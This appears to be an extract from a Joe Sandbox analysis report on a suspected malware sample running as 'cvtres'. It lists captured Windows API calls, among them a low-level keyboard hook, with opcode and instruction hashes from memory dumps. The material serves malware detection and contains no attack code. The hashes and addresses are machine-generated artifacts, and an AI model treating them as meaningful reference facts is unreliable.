                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: e43916ae0081fa2558a3e2725dc97a48e69c27dcd273ea55e52b46059e146ee6
                        • Instruction ID: ba9f2df6b08a9fa80cc92ddb4582eb3617ab170611c4900924cc817cf0f549f8
                        • Opcode Fuzzy Hash: e43916ae0081fa2558a3e2725dc97a48e69c27dcd273ea55e52b46059e146ee6
                        • Instruction Fuzzy Hash: 4C21F8B5904209EFDB10CFA9D884ADEBBF8FB48324F14841AEA54B7350D374A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A9EBAB2), ref: 0A9EBB9F
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: dbe6be3e37a010a939e539f3343ae48dd6cd05903c3ea8f96dbaac3e3ee2579c
                        • Instruction ID: 8c57e2ec2d3f708e47807a2fdb75c4c099daaa8b92f280270a164ccb1d848d16
                        • Opcode Fuzzy Hash: dbe6be3e37a010a939e539f3343ae48dd6cd05903c3ea8f96dbaac3e3ee2579c
                        • Instruction Fuzzy Hash: 4311BB31E056599FCF61CFA894053EEBBB0EF49320F0985AAC858A7243D3385550CFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0AB336FB
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: 9bf094026690eefeb881bef46fbea1d654432d5f0e05726570d7c8b0347e4f8a
                        • Instruction ID: ed57695107d88dab94e020e9bd110bf9b74e43d6eaf055976adb14582674940f
                        • Opcode Fuzzy Hash: 9bf094026690eefeb881bef46fbea1d654432d5f0e05726570d7c8b0347e4f8a
                        • Instruction Fuzzy Hash: C22137B2D042089FCB54DFA9D984BEFBBF5EB88314F148429E415A7250C774A945CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A9EBAB2), ref: 0A9EBB9F
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: b70513a670e409ee66ae20db8d25c2c54f520a978a48fe625a27f715e3f6ac52
                        • Instruction ID: 29d988ef0528d52672931cd0acf02ccd21fddc1b2bdc7a5c69873fa16a7c9f8b
                        • Opcode Fuzzy Hash: b70513a670e409ee66ae20db8d25c2c54f520a978a48fe625a27f715e3f6ac52
                        • Instruction Fuzzy Hash: BE1103B1C006599FCB10CFAAD4847EEFBF4AF48324F15856AD914A7241D378A945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A9EBAB2), ref: 0A9EBB9F
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus
                        • String ID:
                        • API String ID: 1890195054-0
                        • Opcode ID: c7beb24fd62ff3007b52ccc1829f5e6be6c02a6dcc5d4801e2027f5ee3adbf74
                        • Instruction ID: 5a0d54f51e2ce96c9b0b593fbfac71e3ff63c8fc298a6a61160d1c1eafc16bb7
                        • Opcode Fuzzy Hash: c7beb24fd62ff3007b52ccc1829f5e6be6c02a6dcc5d4801e2027f5ee3adbf74
                        • Instruction Fuzzy Hash: 521114B1D046199BCB10DFAAC844BDEFBF8EB48224F05856AE914B7241D378A945CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,00000000,?,0AB3C449,00000800), ref: 0AB3C4DA
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 4ed992301387c96b889a5821ce5a53807bd267c3eda0b9ef59a7f6c1dafe53bb
                        • Instruction ID: 671805e9e93936e817e4576bb146f7d49343bad8f8d7612fa9b99cb7eebbb2e4
                        • Opcode Fuzzy Hash: 4ed992301387c96b889a5821ce5a53807bd267c3eda0b9ef59a7f6c1dafe53bb
                        • Instruction Fuzzy Hash: 5E1106B69002099FDB10DFAAC444BAEBBF4EB89314F15846AE515B7200C374A549CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlEncodePointer.NTDLL(00000000), ref: 06F64D42
                        Memory Dump Source
                        • Source File: 00000001.00000002.539439119.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_6f60000_cvtres.jbxd
                        Similarity
                        • API ID: EncodePointer
                        • String ID:
                        • API String ID: 2118026453-0
                        • Opcode ID: ba9f54b33884199d3e5ee1c6270502a157faf6719d184a400927bc93985012e6
                        • Instruction ID: bfeeaf9fd87416ab9702519978dbb2dd5bbd737d97422601910dec41e323fe8e
                        • Opcode Fuzzy Hash: ba9f54b33884199d3e5ee1c6270502a157faf6719d184a400927bc93985012e6
                        • Instruction Fuzzy Hash: 0C116A71D003458FDBA0EFA9D94879EBBF4EB45314F10C429E505A7640D778A544CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,00000000,?,0AB3C449,00000800), ref: 0AB3C4DA
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 3de1a337e8281be08d749491282afbf017adb8ebd663dc80e086f3346b2662e3
                        • Instruction ID: 7e446f1280723269199e0727621f8c7dea518f36eaec8641a4dd39b711185376
                        • Opcode Fuzzy Hash: 3de1a337e8281be08d749491282afbf017adb8ebd663dc80e086f3346b2662e3
                        • Instruction Fuzzy Hash: A01147B28002489FCB10CFE9C444BDEBBF4EB89324F05846AE515B7200C374A549CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0A9EDF96
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: ea6ce26536772dbe5648c168f04d843fbf5f927f185e62a27e054b2db830f656
                        • Instruction ID: b9b828e5d80a69931e43634b88bf4bd2a66ddded2f4b1ba8a9a6d447f08387c2
                        • Opcode Fuzzy Hash: ea6ce26536772dbe5648c168f04d843fbf5f927f185e62a27e054b2db830f656
                        • Instruction Fuzzy Hash: C111F0B5D106598FCB20DF9AC444BDEBBF8EF88224F11882AE919A7201D375A545CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • KiUserCallbackDispatcher.NTDLL ref: 0AB30BFF
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: CallbackDispatcherUser
                        • String ID:
                        • API String ID: 2492992576-0
                        • Opcode ID: d1e4a7d1cb919f3d8cefba032d439949ac26e286e9607e01db2213b707de3988
                        • Instruction ID: fb2fcc8aeaa17ecf54547994b4b5f92ad5e5400870a82a4728c93d2d3cbc64cb
                        • Opcode Fuzzy Hash: d1e4a7d1cb919f3d8cefba032d439949ac26e286e9607e01db2213b707de3988
                        • Instruction Fuzzy Hash: 981115B19002088FCB10DFAAD488BDEFBF8EF88328F15845AD519A7300D774A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: ae59bf95936c91c06ec56141e1dd9bf4a0cf677925e5a5020eaae7f58d07d4eb
                        • Instruction ID: 25124c9f8ce6f3ab34c90eeb450be7b4800a26ebbcfc8f7fb1cfa9fcb85077a5
                        • Opcode Fuzzy Hash: ae59bf95936c91c06ec56141e1dd9bf4a0cf677925e5a5020eaae7f58d07d4eb
                        • Instruction Fuzzy Hash: 461105B19007488FCB20DFA9D488BDEFBF8EB48324F15855AE519A7700D378A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.539230230.000000000533D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0533D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_533d000_cvtres.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: feef42ecdafe14c93a3bb14ccec189847ea147624305ace132ce1f80a9bdd695
                        • Instruction ID: f527b7b1bd417ec4937879436ebd73706c734a42c5e0212d0be3253fe023fc2e
                        • Opcode Fuzzy Hash: feef42ecdafe14c93a3bb14ccec189847ea147624305ace132ce1f80a9bdd695
                        • Instruction Fuzzy Hash: C82104B5508244EFDB00DF10D5C1B26BB6AFB88324F24C96DE9494B346C37BD856DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%